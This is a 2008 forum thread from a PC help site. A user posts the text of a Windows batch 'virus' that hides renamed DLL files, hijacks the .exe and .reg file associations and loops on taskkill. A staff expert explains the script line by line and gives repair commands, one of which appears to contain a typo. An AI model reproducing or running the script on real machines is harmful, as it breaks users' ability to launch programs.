Annoying special little virus.

Discussion in 'Malware Help (A Specialist Will Reply)' started by DaxterFM, Sep 11, 2008.

  1. DaxterFM

    DaxterFM Private E-2

    So this virus is really interesting. It's caused all my exe files to become .dll files, and all my .req files to become .sys
    Thus, I cannot go into SAFE mode, I cannot run System Restore, and, applications do not work (exe being dll files now).

    I no longer know what to do. And here I am.
    I need your help guys. :(

    By the way, in case you wanted to know how the virus looked like, seeing as that may help :

    (DO NOT SAVE AS BAT FILE UNLESS YOU WANT IT AS WELL)

    "@echo off
    for %%f in (*.dll) do set virus=%%f
    ren %virus% virus%virus%
    attrib +r +h virus%virus%
    assoc .reg=sysfile
    assoc .exe=dllfile
    copy virus%virus% virus%virus%
    :virus
    taskkill /f /t /im virus%virus%
    tskill /f /t /im virus%virus%
    goto virus"

    Thank you in advance.
     
    DaxterFM, Sep 11, 2008
    #1
  2. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    Welcome to Major Geeks!
    • Where did you get this file from?
    • What was it named?
    • Where was it run from? Why did you run this batch file?
    • Are you really sure what you posted is correct? Some of it does not make sense and does not do anything.
    • It does not rename your EXE files. It only renames DLL files and only in the folder where the batch file was run.
    Below is a line by line interpretation of the batch file
    • The 1st line just disable echoing of the commands being run.
    • The 2nd & 3rd lines will rename all dll files to have the word virus in front of it. Thus test.dll would become virustest.dll This would only affect files in the folder where the batch file is run since it does not contain full patch information to any particular folders.
    • The 4th line sets the renamed file to be READONLY and HIDDEN
    • The 5th line changes .reg files to be associated as .sys files
    • The 6th line changes .exe files to be associated as .dll files
    • The 7th line does nothing because it is trying to copy the renamed file to the same filename which serves no purpose and cannot find the file because it was already hidden and also it could not overwrite the same file name anyway since the file is set to READONLY.
    • The 8th line is a label for the goto
    • The 9th line attempts to terminate the process and child processes of the renamed dll file which also serves no purpose since in most cases the DLL itself is not running.
    • The 10th line will do nothing because the options used for tskill are not even valid.
    • The 11the line cause the batch file to continues run looping on lines 8 thru 10.
    You can change your file associations back by running the below commands from either the Start, Run box, or from Task Manager, or from a command prompt. There is a space after the assoc

    assoc .dll=dllfile
    assoc .exe=exefile
    assoc .reg=regefile
    assoc .sys=sysfile

    The renaming of DLL files to remove the prepended virus text will have to be performed in the folders where the batch file was run. You will have to use attrib -r -h *.* to unhide the files and to remove the READONLY attribute before you can rename them.
     
    Last edited: Sep 12, 2008
    chaslang, Sep 12, 2008
    #2

MajorGeeks.Com Menu

Downloads All In One Tweaks \ Android \ Anti-Malware \ Anti-Virus \ Appearance \ Backup \ Browsers \ CD\DVD\Blu-Ray \ Covert Ops \ Drive Utilities \ Drivers \ Graphics \ Internet Tools \ Multimedia \ Networking \ Office Tools \ PC Games \ System Tools \ Mac/Apple/Ipad Downloads

Other News: Top Downloads \ News (Tech) \ Off Base (Other Websites News) \ Way Off Base (Offbeat Stories and Pics)

Social: Facebook \ YouTube \ Twitter \ Tumblr \ Pintrest \ RSS Feeds